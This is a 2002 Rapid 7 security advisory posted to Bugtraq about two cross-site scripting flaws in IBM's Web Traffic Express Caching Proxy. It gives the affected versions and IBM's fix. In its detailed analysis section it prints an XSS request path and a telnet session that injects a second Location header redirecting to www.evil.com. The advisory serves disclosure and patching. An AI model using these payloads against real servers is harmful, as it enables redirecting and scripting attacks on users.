From advisory@rapid7.com Thu Oct 24 09:45:22 2002 From: Rapid 7 Security Advisories To: bugtraq@securityfocus.com Date: Wed, 23 Oct 2002 17:51:52 -0400 Subject: R7-0008: IBM WebSphere Edge Server Caching Proxy Cross-Site Scripting Issues -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Rapid 7, Inc. Security Advisory Visit http://www.rapid7.com/ to download NeXpose(tm), our advanced vulnerability scanner. Linux and Windows 2000 versions are available now! _______________________________________________________________________ Rapid 7 Advisory R7-0008 IBM WebSphere Edge Server Caching Proxy Cross-Site Scripting Issues Published: October 23, 2002 Revision: 1.0 http://www.rapid7.com/advisories/R7-0008.txt o First XSS issue (standard XSS) IBM: APAR# IY24527 CVE: CAN-2002-1167 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1167 Bugtraq: 6000 http://online.securityfocus.com/bid/6000 o Second XSS issue (HTTP header injection) IBM: APAR# IY35139 CVE: CAN-2002-1168 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1168 Bugtraq: 6001 http://online.securityfocus.com/bid/6001 1. Affected system(s): KNOWN VULNERABLE: o IBM Web Traffic Express Caching Proxy Server v4.x (bundled with IBM WebSphere Edge Server v2.0) o IBM Web Traffic Express Caching Proxy Server v3.6 2. Summary IBM Web Traffic Express Caching Proxy server is vulnerable to cross site scripting. The Caching Proxy server allows script code to be injected into pages using standard cross-site scripting techniques. A second, variant attack allows the HTTP headers to be manipulated. IBM now bundles Web Traffic Express v4.0 with WebSphere Edge Server v2.0. IBM Web Traffic Express v3.6 and earlier were separately shipping products. 3. Vendor status and information IBM Software http://www-3.ibm.com/software/webservers/edgeserver/index.html IBM was notified of this issue and has released efix build number 4.0.1.26 for Caching Proxy Server v4.x, which fixes this issue and other security issues (see Rapid 7 advisory R7-0007 for more information: http://www.rapid7.com/advisories/R7-0007.txt ). IBM is tracking the first (standard) XSS issue as APAR# IY24527. IBM is tracking the second (header injection) XSS issue as APAR# IY35139. 4. Solution IBM customers should install Caching Proxy efix build 4.0.1.26 or higher. Efix builds can be downloaded from IBM's secure FTP site. For more information on obtaining efix builds, contact IBM support with the APAR numbers listed above. The fixes have also been ported back to the Web Traffic Express v3.6 code base. Customers running v3.6 should contact IBM support for more information on how to upgrade to a newer build. 5. Detailed analysis There are two XSS techniques that can be used against the caching proxy server. Please note that the following text may be wrapped or otherwise mangled by mail clients or gateways. You should refer to the original advisory if there is a question about the exact text. a) Standard XSS exploit against Web Traffic Express Caching Proxy Request the following path from the caching proxy server: /"> b) XSS exploit against Web Traffic Express Caching Proxy, adding a second "Location:" header by using %0a%0d telnet www.victim.com 80 Trying 192.168.100.1... Connected to www.victim.com. Escape character is '^]'. GET /%0a%0dLocation:%20http://www.evil.com/"> HTTP/1.0 HTTP/1.1 302 Found Server: IBM-PROXY-WTE-US/3.6 Date: Fri, 18 Oct 2002 03:44:18 GMT Location: http://www.victim.com/;www.victim.com/ Location: http:/www.evil.com/ Accept-Ranges: bytes Content-Type: text/html Content-Length: 443 Last-Modified: Fri, 26 Jul 2002 03:44:18 GMT ... 6. Contact Information Rapid 7 Security Advisories Email: advisory@rapid7.com Web: http://www.rapid7.com/ Phone: +1 (212) 558-8700 7. Disclaimer and Copyright Rapid 7, Inc. is not responsible for the misuse of the information provided in our security advisories. These advisories are a service to the professional security community. There are NO WARRANTIES with regard to this information. Any application or distribution of this information constitutes acceptance AS IS, at the user's own risk. This information is subject to change without notice. This advisory Copyright (C) 2002 Rapid 7, Inc. Permission is hereby granted to redistribute this advisory, providing that no changes are made and that the copyright notices and disclaimers remain intact. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (OpenBSD) iD8DBQE9tuwTcL76DCfug6wRAjNRAJ4qMUKne/vS+7k41XXYKS0wZ4PBFwCfdl8J +BWWNXDgIxkFJT1tiKzaHW4= =icsO -----END PGP SIGNATURE-----